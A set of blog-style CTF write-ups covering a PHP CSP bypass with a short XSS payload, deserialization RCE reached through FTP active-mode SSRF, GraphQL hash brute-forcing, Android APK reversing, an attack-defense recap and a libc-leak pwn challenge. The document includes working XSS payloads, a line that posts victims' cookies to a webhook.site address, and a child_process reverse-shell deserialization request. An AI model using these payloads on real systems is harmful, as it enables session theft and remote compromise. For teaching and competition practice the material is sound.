for($i=0; $i<10; $i++){
    if(isset($_GET['alg'])){
        $_nonce = hash($_GET['alg'], $nonce);
        if($_nonce){
            $nonce = $_nonce;
            continue;
        }
    }
    $nonce = md5($nonce);
}

if(isset($_GET['user']) && strlen($_GET['user']) <= 23) {
    header("content-security-policy: default-src 'none'; style-src 'nonce-$nonce'; script-src 'nonce-$nonce'");
    echo <<<EOT
        <script nonce='$nonce'>
            setInterval(
                ()=>user.style.color=Math.random()<0.3?'red':'black'
            ,100);
        </script>
        <center><h1> Hello <span id='user'>{$_GET['user']}</span>!!</h1>
        <p>Click <a href="?flag">here</a> to get a flag!</p>
EOT;
}else{
    show_source(__FILE__);
}

// Found a bug? We want to hear from you! /bugbounty.php
// Check /Dockerfile

There’s a reflected-XSS attack which can be done through the user query parameter. However, the Content-Security-Policy is pretty strict and my XSS payload has to be less than 23 chars. The CSP uses a nonce value (randomized 8 bytes), which we can see in the for loop above, is hashed 10 times. There’s no feasible way to reverse a hash 10 times. So, there are 2 obstacles to overcome: how to create an XSS payload that’s at most 23 characters long, and also how to bypass the hashing of this nonce value.

The nonce value and PHP response buffers

The nonce value is hashed 10 times with a hashing algorithm of our choosing (md5 if we don’t choose), using the alg query parameter. However, something interesting that teammate Filip pointed out while I was working on this challenge was the fact that this server was being run on a development config, which you can find out by checking the /Dockerfile endpoint. This fact became relevant to me when, in doing recon for the challenge, I tried to make a GET request with the alg query parameter and accidentally misspelled sha256 (it was 3am). What happened was this:

We get 10 warnings (A warning per iteration in the for loop) that fill the webpage, complaining about our mistake. The reason why we see these is because the PHP server is in a development environment - so the warnings are given to us in the responses.

PHP was initially developed as a procedural language. The script provided to us is executed in order - it first does actions according to the presence of a flag in a recieved request, then it iterates through the for loop, hashing the nonce value accordingly. Then, it performs actions based on the presence of the user parameter. It is here in the if statement for the user query where the Content-Security-Policy is set:

header("content-security-policy: default-src 'none'; style-src 'nonce-$nonce'; script-src 'nonce-$nonce'");

So headers are being modified when the user query is specified, but if you also specify an alg query and give it an invalid value, the server’s response will first have 10 warnings before the headers of that response are ready.

These warnings also reflect our input back to us, so we can modify the size of each warning by our alg input. Why is this relevant?

PHP has a mechanism called output buffering - if you have a script that began outputting data before the headers were set, that data is put into a buffer which will be sent once the entire response is ready. The PHP response buffer is 4096 bytes (4KB), and once it’s filled, it’s immediately flushed and the data within it is sent over.

So, if we could specify a value in the alg query that’s sufficiently long enough to fill the response buffer, we will initiate a response sent from the server, regardless of whether or not the headers are ready. Thus, the CSP header() call will be ignored as a response was already sent. With this, we don’t need to worry about whatever the $nonce value is hashed to, cause we can bypass the CSP entirely.

XSS payload <= 23

I initially tried to format an xss payload on my own, trying to shorten my URL domain or use different tags, but with some googling I found <svg/onload=> to be effective.

Specifically, the example provided was <svg/onload=eval(name)>, so ideally I could modify the name variable to do what I want. Something like:

name = alert(1);

<svg/onload=eval(name)>

Putting it all together

We can test out if whether or not overloading the response buffer will bypass the CSP with this query:

https://baby-csp.web.jctf.pro/?alg=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&user=<svg/onload=alert(1)>

And this will prompt an alert. We can see the HTML of the webpage and find that our <svg> payload is correctly interpreted as such:

So, all that’s left is to craft a working payload. Due to the /bugbounty.php endpoint, we have a way to make the admin visit a URL we specify, so the rest of the problem is correctly formatting our XSS payload. I ended up hosting a page on my server to redirect the bot to the flag endpoint once they visited, and leak the contents of that response to a webhook. Unfortunately, I wasn’t able to grab the flag in time before I could submit it - at that point, the CTF had ended :( I suppose next time I’ll be more efficient given that I learned alot about PHP.

And that’s a portion of the challenges I took a look at during justCTF. Hopefully next time I can solve challenges more efficiently :P

Vie

TL;DR

• Application is vulnerable to RCE via insecure deserialization on the /csp-report endpoint
• Use FTP active mode to SSRF a post request to /csp-report that would open a reverse shell on the application’s HTTP server
• Cat flag for profit

Let’s Begin!

The Harmony Chat is a Discord-esque chat app where you can /register an account and create channels. Once registered, you’re given your UID, which you use to /login or to invite other users into a channel you create.

There appears to be an FTP server to serve the role of delivering chat logs of a channel through an FTP data connection, which you can request for in the top-right corner of the chat app’s GUI.

Clicking on it will take whatever you wrote in the channel…

and convert it into a txt file delivered to you through a data connection established by their FTP server to you:

vie: hello
vie: hi
vie: how are u today

The format of the chatlog file that would be delivered to you via FTP

The source was given for the challenge. We can see that the application supports the implementation of 3 servers: an HTTP one, an intermediary websockets one, and an FTP one. More on that in a bit.

Exploring the source more, we see a module called csp which delivers a report should any chat log input violate the application’s content-security policy, when you request for the chat log via HTTP instead of FTP:

const REPORT_URL = "/csp-report"
const ContentSecurityPolicy = (req, res, next) => {
  if (req.path === REPORT_URL &&
      req.method === "POST" &&
      req.headers["content-type"] === "application/csp-report") {
    handleReport(req, res)
    return
  }

  injectCSPHeaders(req, res)
  next()
}

the function handleReport() is defined as so:

const handleReport = (req, res) => {
  let data = Buffer.alloc(0)

  req.on("data", chunk => {
    data = Buffer.concat([data, chunk])
  })

  req.on("end", () => {
    res.status(204).end()

    if (!isLocal(req)) {
      return
    }

    try {
      const report = utils.validateAndDecodeJSON(data, REPORT_SCHEMA)
      console.error(generateTextReport(report["csp-report"]))
    } catch (error) {
      console.warn(error)
      return
    }
  })
}


...

const isLocal = (req) => {
  const ip = req.connection.remoteAddress
  return ip === "127.0.0.1" || ip === "::1" || ip === "::ffff:127.0.0.1"
}

In the csp module, the application does some basic LAN checking when the HTTP server recieves a POST request to the REPORT_URL endpoint (/csp-report).

We can host the application locally. In our local instance, we can go ahead and play with the application ourselves and see what we get. Robert Xiao, team mentor, helped in realizing that RCE was achievable through /csp-report. With the application running locally on the right, we see that we can leverage the app’s use of javascript-serializer to deserialize dangerous payloads. For example, console.log(11111):

So, we can execute code through a POST request to /csp-report! Obviously, we can achieve a simple console.log() but this can be extended further into opening a reverse-shell. Anything is possible :)

So, to recap, we have the capability to communicate to the basic HTTP server and an FTP server, alongside an RCE vulnerability if we make a malformed POST request to /csp-report. Of course, the RCE is easy to achieve when hosting the application locally, since we don’t need to worry about failing the isLocal check. To replicate RCE on the actual application itself, we need to somehow trick a forward-facing server on there to make that POST request for us. AKA, we need to do some SSRF. Now, like mentioned before, we can communicate to 2 servers in the application: the HTTP one, and the FTP one. Let’s explore FTP’s capabilities further.

I’ve actually seen this attack before - tricking an FTP server to send a rogue request to another server is quite easy to do if said FTP server supports active mode. To quickly summarize, FTP on active mode is essentially the client/user stipulating to the server where to establish its data connection to. By convention, you would typically tell it to connect to some port on your machine so you can transfer files between you and the server - but realistically, you can tell the server to establish a connection to wherever you want (so long as “wherever you want” has the stipulated port open).

So the golden question - can we use FTP on active mode and make their server establish a data connection to their HTTP server, allowing us to use FTP to send them the POST request? (…I mean, yes, that’s why we’re here right? :P)

So Harmony Chat’s FTP server serves one (intended) purpose: to store then deliver a file showcasing the chat logs of a specific channel. Unfortunately, the FTP server doesn’t have write access to these files it stores, so it’s not like we can create some dummy file then edit it later. We will have to somehow craft a valid POST request in the chat log of a channel.

How do we get this…

POST /csp-report?: HTTP/1.1
Host: localhost:3380
Content-Length: 386
Content-Type: application/csp-report

{"csp-report": {"blocked-uri": "x", "document-uri": "X", "effective-directive": "X", "original-policy": "X", "referrer": "X", "status-code": "X", "violated-directive": "X", "source-file": {"toString": {"___js-to-json-class___": "Function", "json": "process.mainModule.require(\"child_process\").exec(\"COMMAND TO OPEN A REVERSE SHELL"})"}}}}

On here?

First thing that came to mind was that the chat logs all have the same displayName: message format… So the thought was to split the POST request by the first occurence of : on each new line and have these different “users” deliver specific “messages” to construct the POST request there. You had the ability to invite multiple users to one channel, so this was probably the way to go.

I know that this can be automated - but I did the process manually. So, we should have 5 “users”: POST /csp-report?, Host, Content-Length, Content-Type and {"csp-report". They will then each message the chat in order as so…

NOTE: not seen here, but I used the console to send an empty message that would register as a new line to seperate the request headers from the request body. You’ll see what this looks like in a bit.

I bet you can see where I’m going with this. If we go ahead and download the associated chat log file, we get:

POST /csp-report?: HTTP/1.1
Host: localhost:3380
Content-Length: 386
Content-Type: application/csp-report

{"csp-report": {"blocked-uri": "x", "document-uri": "X", "effective-directive": "X", "original-policy": "X", "referrer": "X", "status-code": "X", "violated-directive": "X", "source-file": {"toString": {"___js-to-json-class___": "Function", "json": "process.mainModule.require(\"child_process\").exec("COMMAND TO OPEN A REVERSE SHELL"}}}}

Which looks exactly like the POST request we would send to the HTTP server.

We go ahead and ask the FTP server to STOR that chat log file in it (by clicking the logs button at the top right), and then connect to it ourselves. We need to give it these commands:

user <uid>
pass                    <-- Doesn't matter
port 172,0,0,1,13,52    <-- Sets FTP on active mode so this is required
retr <id of channel>    <-- Retrieves chat log, sends it in the data channel

• The user command is expecting a uid of any user in the current session. We technically made 5, so any of their uids work.

• The pass command can be blank, as the implementation of the application said any password will be accepted.

• The port command is what makes the FTP server operate in active mode. The command’s arguments are the 4 bytes of the IP, then the 2 remaining values are the port number following this convention: p1, p2 where (p1 * 256) + p2 = full port number. We want to connect to Harmony Chat’s localhost at the HTTP server, which is at port 3380.

• The retr command takes the name of a file (in this case, the name of the chatlog) and retrieves it, then sends it over the data connection it just established. If we got things right, then the FTP server would have sent our POST request to the HTTP server.

Once the FTP server has confirmed that it RETRieved the channel’s chatlog and sent it to the local HTTP server, we check back on our ngrok instance and see that a reverse-shell opened up. All that’s left now is to ls our way to the flag :)

Vie

Let’s Begin!

The confessions webpage was a message-generation application that would hash (in sha-256) your message based on the title and content of it. Under the hood we see the nature of how these messages are stored:

// talk to the GraphQL endpoint
const gql = async (query, variables={}) => {
    let response = await fetch('/graphql', {
        method: 'POST',
        headers: {
            'content-type': 'application/json',
        },
        body: JSON.stringify({
            operationName: null,
            query,
            variables,
        }),
    });
    let json = await response.json();
    if (json.errors && json.errors.length) {
        throw json.errors;
    } else {
        return json.data;
    }
};

// some queries/mutations
const getConfession = async hash => gql('query Q($hash: String) { confession(hash: $hash) { title, hash } }', { hash }).then(d => d.confession);
const getConfessionWithMessage = async id => gql('mutation Q($id: String) { confessionWithMessage(id: $id) { title, hash, message } }', { id }).then(d => d.confessionWithMessage);
const addConfession = async (title, message) => gql('mutation M($title: String, $message: String) { addConfession(title: $title, message: $message) { id } }', { title, message }).then(d => d.addConfession);
const previewHash = async (title, message) => gql('mutation M($title: String, $message: String) { addConfession(title: $title, message: $message) { hash } }', { title, message }).then(d => d.addConfession);

The application uses graphQL as an intermediary to the database. Specifically, the client “talks” to graphql via the \graphql endpoint. If we take a look at what happens when we create a message:

The construction of this “mutation” object is common in graphQL implementations. However, to actually “talk” to the endpoint, you don’t always need to generate a mutation object.

What else can we ask of the endpoint? If we perform some regular introspection into their graphQL infrastructure, we see something interesting (I’m using the graphQL IDE here to avoid having to worry about formatting in an API request):

The description on the query’s field accessLog is the big hint here. Let’s expand upon accessLog further:

{
  accessLog{
    name
    timestamp
    args
  }
}

We recieve a list of hashes, also in sha-256. Running the first 4 hashes through an online sha-256 database reveal to me that they decrypt to “f”, “fl”, “fla”, then finally “flag”. The full flag of this challenge is obviously the very last hash in this accessLog, so now we must bruteforce the incoming letters (which isn’t too crazy. If we operate under the assumption that the flag has letters that are all lowercase, numbers 0-9, and maybe the - or _ chars, we are dealing with 38 bits of entropy per letter, which is manageable. Additionally, we are aware by convention that all flags start with flag{ and the last char is }, so we can already figure out what the 5th hash decrypts to). Special thanks to teammate Filip for explaining to me how to do it :-)

from hashlib import sha256
from pwn import *


alphanumerics = "abcdefghijklmnopqrstuvwxyz1234567890{}_-"
hashes = ["""all the hashes found in accessLog. There were a lot."""]

flag = b''


for hash in hashes:
	for c in alphanumerics:
		m = sha256()
		m.update(flag + c.encode("utf-8"))
		testhash = enhex(m.digest())
		if (testhash == hash):
			flag += c.encode("utf-8")
			print (flag)
			continue

And that’s that! A quick and straightforward challenge. It was a good warmup into the other excellent web problems I saw :)

Vie

During the event, I was focused on one problem alongside my teammate Arctic, our resident crypto expert. Special thanks to Robert as well for assisting me throughout the challenge! The problem we were focused on was the RF-Mobile challenge known as “Keybox”.

Let’s Begin!

Keybox is an android app. The zip file of the challenge contained a single APK file, which I popped into android studio to poke around in, and used jadx to manually look through the files as well. In the APK, the AndroidManifest.xml file was far more informative than it regularly would be, defining several unique intents as well as new behaviour for other ones. The app itself, “Keybox”, was essentially a psuedo-spyware program - based on what you did while the app was open, it would listen in on any intents you made and act accordingly.

The app itself was straightforward enough. The flag was in it, but encoded in rc4, with a specific key that was split across 5 values that themselves were encoded (also in rc4) with unique keys of their own. The idea was that you had to “solve” 5 levels in order to have the app decode the key fragment for you. There were hints (also encoded, but with the same key) that gave you a clue as to what to do to decrypt the key fragment. Once you decrypted all 5 keys, you combine it and use it as the key to decrypt the flag.

So, let’s quickly review:

• the flag is encoded in rc4. The key for the flag’s encoding algorithm is split into 5 other key bits.

• those key bits are also encoded in rc4, each key bit having their own unique encoding key. However, there are hints as to how to unlock them.

• those hints are encoded too. Luckily, the hints all share the same decryption key.

Great! So we know nothing. Let’s just jump into it.

Key 0

First up, key 0. The hint was already decoded for us:

But the actual key bit itself was still unknown. So I poked around in the AndroidManifest.xml file and saw this:

       <activity
            android:theme="@ref/0x7f0e0008"
            android:label="@ref/0x7f0d003a"
            android:name="com.trendmicro.keybox.KEY1HintActivity"
            android:exported="true"
            android:hint="Unlocking the hints requires sending the appropriate intent : adb shell am start-activity -a com.trendmicro.keybox.UNLOCK_HINT -n com.trendmicro.keybox/.KEY1HintActivity -e hintkey1 $PASSWORD"
            android:parentActivityName="com.trendmicro.keybox.KeyboxMainActivity">

            <intent-filter>

                <action
                    android:name="com.trendmicro.keybox.UNLOCK_HINT" />

                <category
                    android:name="android.intent.category.LAUNCHER" />
            </intent-filter>

            <meta-data
                android:name="android.support.PARENT_ACTIVITY"
                android:value="com.trendmicro.keybox.KeyboxMainActivity" />
        </activity>
        

This was to unlock the hint for key 1. It was an app-specific intent that required a password. The intent itself would actually decrypt the hint, with the password you provided it as the key (am I using ‘key’ too much here?). Since the actual “hint” in key 0 didn’t really deliver information to me about how to unlock key 0, I figured I would request the hint again. But I didn’t know the password value(more on this later). So Arctic and I bounced a few ideas back and forth until I thought to sanity check and use the same password provided to us to unzip the challenge file.

I’m not sure why that worked. I’m not totally sure this was intended or not. But regardless, the key for key 0’s encryption process was the password that was used to unzip the challenge file. Later on, Arctic mentioned that the real hint for key 0 we maybe never found out, and we ended up just correctly guessing the key to decode key0.

Key 1

So on a bit of lucky streak, I continued on to key 1, while Arctic decrypted the hints. Because we still didn’t know the encryption key for the hints, Arctic used a scoring function to decode as much of the hints in the ciphertexts as possible. The bits and pieces she recovered for key1’s hint was:

To unlock Key 1, you must call Trend Micro.

It was at this point that I was examining the other classes in the APK that I realized that the encryption key was hidden in the singleton class - TrendMicro.

Another teammate and mentor Robert quickly spun up a python script called decrypt.py to automate much of the decrypting process, now that we figured out the password. But the full hint for key 1 didn’t reveal anything else. That was the whole hint.

So now I had to look at and see how the app listens in for incoming and outgoing calls.

I spent a good portion of my time calling up all possible Trend Micro office numbers through my emulator, and simulating incoming calls from them, to no avail. And so I thought about it a bit more:

In the observer class in the APK file, they instantiated a listener to look for incoming calls (the CALL_STATE android intent). The hint suggested to call the office, but the code itself seemed to only be paying attention to incoming callers, not calls you make. Wether or not the intention was to do both, I thought about how this would work.

Since the app was listening in on call history, how would it then know when to decrypt KEY1? What is the encryption key it’s looking for? Well, since the hint and the code all pointed to the act of making and recieving calls, then the encryption key to decode KEY1 must be a phone number. And wether or not I was having luck with dialing all possible offices to see if the app’s listener would take notice, the components were all there. The encryption key had to be a phone number. We knew that KEY1 bit was encoded in rc4. So, couldn’t we just take the .enc file and give it a couple Trend Micro phone numbers as a key, and run it through the rc4 decryption process?

It turned out that the phone number for Trend Micro’s Japan HQ was the key to decrypt KEY1.

Key 2

With that being said, key 2 was way easier to decrypt. The hint for it was simple:

To unlock KEY2, send the secret code.

Which is sufficiently vague, but “secret codes” are meaningful in Android developement.

Secret codes are specific sequences of numbers that could perform special actions. For example, the code 232338 would reveal your android phone’s MAC address. Applications can also use them to perform secret tasks or unlock hidden features. If you wanted to test this out on your android device, open up your dialer and input a secret code as so: *#*#123456#*#*.

In the AndroidManifest.xml file, the SECRET_CODE intent is defined:

            <intent-filter>
                <action android:name="android.provider.Telephony.SECRET_CODE"/>
                <data android:host="\ 8736364276" android:scheme="android_secret_code"/>
                <data android:host="\ 8736364275" android:scheme="android_secret_code"/>
            </intent-filter>

So the secret code in the app is the encryption key for KEY2!

You can either use abd to send the android.provider.Telephony.SECRET_CODE intent or just use the dialer in the emulator, as the app has a listener on the call function. Either way, you get KEY2.

Key 3

The hint for Key3 was:

Unlock KEY3 by sending the right text message. 

This requires some explanation on the architecture of text messages in an android phone.

SMS messages are kept in a relational database - specifically, sqlite. In the APK’s observer class, we see some interesting checking going on:

    invoke-interface {v5, v2}, Landroid/database/Cursor;->getColumnName(I)Ljava/lang/String;

    move-result-object v5

    invoke-virtual {v4, v5}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z

    move-result v4

    if-eqz v4, :cond_a8

    iget-object v4, p0, Lcom/trendmicro/keybox/Observer;->cursor:Landroid/database/Cursor;

    iget-object v5, p0, Lcom/trendmicro/keybox/Observer;->cursor:Landroid/database/Cursor;

    const-string v6, "type"

    invoke-interface {v5, v6}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I

    move-result v5

    invoke-interface {v4, v5}, Landroid/database/Cursor;->getInt(I)I

What’s happening here? Well, long story short, when we send an SMS message, the app will access the SMS sqlite database and iterate through the columns of that database, and match the content of the text message to the column name. If there’s a match, then the app will unlock the 3rd key for us. This must mean that the string needed to decrypt the third key bit must be one of the column names!

The column name that decrypted KEY3 turned out to be ‘body’.

Key 4

Despite KEY4 having the longest hint, and arguably the most amount of time to do, KEY4 was remarkably simple. The details are in the function of the ciphertext:

// why actually calculate distance when you can just fake it ;)
        if(Math.abs(location_latitude - singleton_latitude) < 0.001 && Math.abs(location_longitude - singleton_longitude) < 0.001 ) {
            Log("Matched Location " + location.location);
            var SHA1 = new Hashes.SHA1;
            hash = SHA1.hex(location.location)
            if( hash == location.hash) {
                location_match = "Welcome to " + location.location;
            } else {
                location_match = "Welcome to " + location.location;
                singleton.push(location.hash);
            }
            break;
        } else {
            location_match = ""
        }
    }


    titleView.setText("Key Four Hints");
    textView.setText(
    "Visit " + /* all three of */ "the headquarters to unlock Key 4" + "\n\n" +
    location_match
    );

    return(true)`

The hint specified to visit only the 3 headquarters, which were in the USA, Canada and Japan (Irving, Ontario and Tokyo respectively). While you can simulate your location in the emulator to pretend as if you visited all 3 locations, what it was looking for was the hash of the lat-lon location. It would check if that hash was among the list of accepted ones (which are only the hashes of the 3 HQs), and then append those hashes and use it as the key to decrypt KEY4.

So, we needed to just append the hashes of the 3 headquarters, and input that as our decryption key to key4.enc.

The Flag

With all 5 keys decrypted, all that was left was to combine them all and decrypt the flag.

TMCTF{pzDbkfWGcE}

Special thanks to my teammates, rctcwyvern and Robert for helping me out :) I’m thankful I spent my earlier CS years playing around in Android Studio. I unknowingly gained some valuable skills needed to reverse engineer the APK. Goes to show how every little thing counts! :P

Vie

This year of the finals round gave us an online offering of the attack-defense CTF competition, marking my first experience with attack-defense style CTFs. Overall the challenges and showmanship were alright throughout the competition, but a big barrier between my team and the others participating was the timezone. VolgaCTF was occuring in the midday in Russia, which was midnight in my timezone.

My team and I had to pull an all-nighter to partcipate in the finals round, and the lack of sleep was definitely to our disadvantage.

The Setup

Since the round was online due to COVID-19, we did not participate in person. Our setup was all virtual: we used a VPN to connect to the VM instance given to us by the competition organizers. The setup was as so:

• We are given a unique vulnbox instance that are accessible only via the VPN connection, which we connected to on the day of.

• The services (challenges) are all in the vulnbox, isolated via docker containers. There were 4 services in total, and we were responsible for their upkeep. This proved challenging - essentially adopting the role of sysadmin as we attempted to patch these services and keep them running. Every team’s instance of a service were being flooded by requests from other teams to get flags, so we unintentionally adopted DevOps roles alongside hacking. If a service was down for us on our server, we couldn’t obtain flags from other servers while it was down.

• Flags were to be configured as VolgaCTF{stuff here} kept in a unique, specific encoding. We had a script that automated flag decoding and submission.

The Challenges

The challenges were straightforward and almost all encompassed web-based exploits, which was a welcome developement for me. I focused on the last challenge, PDFer, as it was the longest unsolved service and I was obsessed with getting first blood on it :P.

Summary

This is my first attack-defense CTF. Having it fully online? An interesting experience. My mentors and other team members who had participated in more CTFs remarked that in-person attack-defenses are a completely different experience entirely, and I really want to see what that would be like (which I guess isn’t anytime soon). The concept itself was cool, although the duty of maintaining the servers as a sysadmin was not necessarily something I was anticipating. Unfortunately, there was a limit to the amount of people who could participate in the finals, and if the limit was increased, more stratified and defined roles could have existed to allow members to focus on one specific thing in the CTF. Perhaps my next attack-defense will have a higher team limit.

But overall, the experience was a unique one, and I am happy to have participated in the attack-defense CTF given it was my first. Hopefully, there will be many more to come in my future.

Jam

Let’s Begin!

The challenge lets us load into the DOM whatever we want through this pastebin-esque function. When you make a note, you have an option to share it with a “TjMike” Entity. Sign of XSS/CSRF attacks?

My input, “uwu”, is shoved into a javascript string variable called ’note’. Further down we see a const clean variable that calls DOMpurify to sanitize our input.

Looking into the HTML, whatever content we put into the note is immediately shoved into a javascript string. However, if you try to input quotation marks in there, the DOMpurify clean function escapes it. So, if we can get an unescaped quote in there, we can do whatever we want. Let’s focus on the comment.

Going to the /source endpoint takes us, well, directly to the webpage’s app file.

Of note are the app’s use of using the Express BodyParser to operate on ’extended’ mode (using the qs library instead of the querystring library).

In the source we also see:

JSON.stringify(unsafe) - if our content (unsafe) is a string, then the function simply adds additional quotation marks onto the string, and the slice(1,-1) function removes those extra quotations, before feeding it to the DOM to be rendered. What if our input isn’t a string - what if it’s an array?

The qs library allows arrays to be parsed from HTTP requests if theyre stipulated as:

{
    array[]=a&array[]=b

    //array = [a,b]
}

When we make a note (POST request to /note), intercept the request via burpsuite. Modify your query there. Change content= to content[]= (Alternatively, you can CURL your request to not deal with proxy settings).

If we go to the page, we see that an alert is prompted - aka, we have succesfully escaped the JS string and can write javascript code as normal. That being said, let’s go ahead and craft a payload to xss TJMike (I am being lazy and reusing an old payload of mine from before and modifying it).

content[]=; document.getElementById('note-content').onLoad = fetch('https://webhook.site/64627794-30a4-466d-b93a-537bdebca744', {method:'POST', body:JSON.stringify({data:document.cookie})});const uwu = 

Share our note to TJMike. Wait for our server to grab their cookie.

Jam

However, I have mentioned before wanting to branch out and diversify my skillset in hacking; and while I definitely have more knowledge in web exploits, I also know a thing or two about pwning. Hacktivity Con CTF was a competition that ran this month, introducing several different challenges that I sunk my teeth into. I will showcase one of them here, called “Bullseye”.

Let’s Begin!

Bullseye is a binary exploit challenge where we are given an executable called “bullseye”. Running it through ghidra, we can locate the main function - the binary isn’t stripped:

We’re allowed a single ‘write’ privilege to change some aspect of the program. In pwn challenges, the goal would be to change the value in the instruction pointer - typically, common knowledge is to change the original value in the EIP register and have it take the address of the libc system function, allowing us to open a shell and do all sorts of things. We don’t know where the libc location is through the global offset table, so figuring out the address of system will be our main issue.

What’s interesting is that the main() function returns by exit() - hence why we only get one write. However, if we use our one write to change exit() to instead jump back to main in the last line, we can bypass the “one write only” rule, sort of making our main() function recursive.

Doing this, we actually get a libc leak, through the function alarm. I find out afterwards that ASLR is disabled in this executable! This is important - with this libc leak, we can solve our “where is libc in the GOT” question, and calculate the system function’s address in memory through it. So we now have an oppurtunity to call system, but what line should we replace in main to open our shell in?